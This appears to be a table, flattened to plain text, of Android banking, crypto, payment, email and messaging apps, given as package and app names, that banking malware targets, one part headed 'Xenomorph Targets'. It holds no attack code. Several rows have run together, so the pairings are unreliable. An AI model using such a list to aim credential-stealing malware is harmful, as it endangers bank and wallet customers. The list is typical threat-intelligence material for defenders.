de.commerzbanking.mobil Commerzbank Banking - The app at your side  
hu.cardinal.erste.mobilapp Erste Business MobilBank  
com.greater.Greater Greater Bank  
com.db.pbc.miabanca La Mia Banca ME Bank  
com.ubercab.eats Uber Eats: Food Delivery  
posteitaliane.posteapp.apppostepay Postepay ABN AMRO Mobiel Bankieren Crédit Mutuel de Bretagne  
fr.creditagricole.androidapp Ma Banque  
de.postbank.finanzassistent Postbank Finanzassistent  
mbanking.NBG NBG Mobile Banking  
com.fusion.ATMLocator People’s Choice Credit Union Oney France VR Banking Classic HSBC Australia  
org.telegram.messenger Telegram  
eu.eleader.mobilebanking.abk ABK Mobile Banking  
com.gmowallet.mobilewallet ビットコイン・暗号資産(仮想通貨)ウォレットアプリ GMOコイン|チャート・購入・レバレッジ取引 Snapchat  
com.mediolanum Banco Mediolanum España  
com.facebook.katana Facebook  
com.wrx.wazirx WazirX - Buy Sell Bitcoin & Other Cryptocurrencies  
pl.bps.bankowoscmobilna BPS Mobilnie  
com.viber.voip Viber Messenger - Messages, Group Chats & Calls  
com.infrasofttech.MahaBank Maha Mobile  
pl.raiffeisen.nfc Mobilny Portfel  
org.banking.bsa.businessconnect BankSA Business App  
pl.bzwbk.ibiznes24 iBiznes24 mobile Discover Mobile  
pl.ifirma.ifirmafaktury IFIRMA - Darmowy Program do Faktur  
com.empik.empikfoto Empik Foto  
pl.envelobank.aplikacja Pocztowy  
com.fi7026.godough Commercial Bank Mobile Banking Santander Mobile Banking Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum L’Appli Société Générale  
pt.santandertotta.mobileparticulares Santander Particulares  
com.moneybookers.skrillpayments Skrill - Fast, secure online payments  
fr.laposte.lapostemobile La Poste - Services Postaux  
com.mercadopago.wallet Mercado Pago USAA Mobile  

Xenomorph Targets

Package name App name  
com.exictos.mbanka.bic Banco BIC, SA Meridian Mobile Banking BBVA Portugal  
net.bitbay.bitcoin Bitcoin & Crypto Exchange - BitBay CA Mobile mail  
com.bankinter.launcher Bankinter Móvil PayPal Mobile Cash: Send and Request Money Fast  
com.mediolanum Banco Mediolanum España  
pt.novobanco.nbapp NB smart app HSBC Canada TransferWise Money Transfer Cajasur  
es.pibank.customers Pibank Millenniumbcp  
ca.motusbank.mapp motusbank mobile banking  
com.db.pbc.mibanco Mi Banco db  
es.univia.unicajamovil UnicajaMovil Openbank – banca móvil Simplii Financial CIBC Mobile Banking® BBVA Net Cash ES & PT
es.cecabank.ealia2091appstore ABANCA Pay - Paga y envía dinero con el móvil  
com.plunien.poloniex Poloniex Crypto Exchange RBC Mobile Cash App NBapp Spain  
com.rsi ruralvía  
es.liberbank.cajasturapp Banca Digital Liberbank Yahoo Mail – Organized Email Desjardins mobile services  
es.evobanco.bancamovil EVO Banco móvil Microsoft Outlook: Organize Your Email & Calendar TD Canada Affinity Mobile  
com.shaketh Shakepay: Buy Bitcoin Canada - Bankia Binance - Buy & Sell Bitcoin Securely  
es.ibercaja.ibercajaapp Ibercaja  
com.eqbank.eqbank EQ Bank Mobile Banking Connect for Hotmail & Outlook: Mail and Calendar BPI APP Caixadirecta National Bank of Canada imaginBank - Your mobile bank  
com.anabatic.canadia Canadia Mobile Banking  
es.cecabank.ealia2103appstore UniPay Unicaja  
org.electrum.electrum Electrum Bitcoin Wallet  
es.caixagalicia.activamovil ABANCA- Banca Móvil  
www.ingdirect.nativeframe ING España. Banca Móvil Coinbase – Buy & Sell Bitcoin. Crypto Wallet BBVA Spain WiZink, tu banco senZillo  
com.wavesplatform.wallet Waves.Exchange Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum  
com.scotiabank.banking Scotiabank Mobile Banking Bitstamp – Buy & Sell Bitcoin at Crypto Exchange  
es.caixaontinyent.caixaontinyentapp Caixa Ontinyent Pro: Advanced Bitcoin & Crypto Trading  
com.coastcapitalsavings.dcu Coast Capital Savings  
es.bancosantander.apps Santander  
ca.servus.mbanking Servus Mobile Banking  
com.atb.ATBMobile ATB Personal - Mobile Banking  
com.targoes_prod.bad TARGOBANK - Banca a distancia  
ca.manulife.MobileGBRS Manulife Mobile  
com.grupocajamar.wefferent Grupo Cajamar  
com.tecnocom.cajalaboral Banca Móvil Laboral Kutxa CaixaBank Gmail ABANCA - Portugal Tangerine Mobile Banking  
com.bitfinex.mobileapp Bitfinex MB WAY PC Financial Mobile  
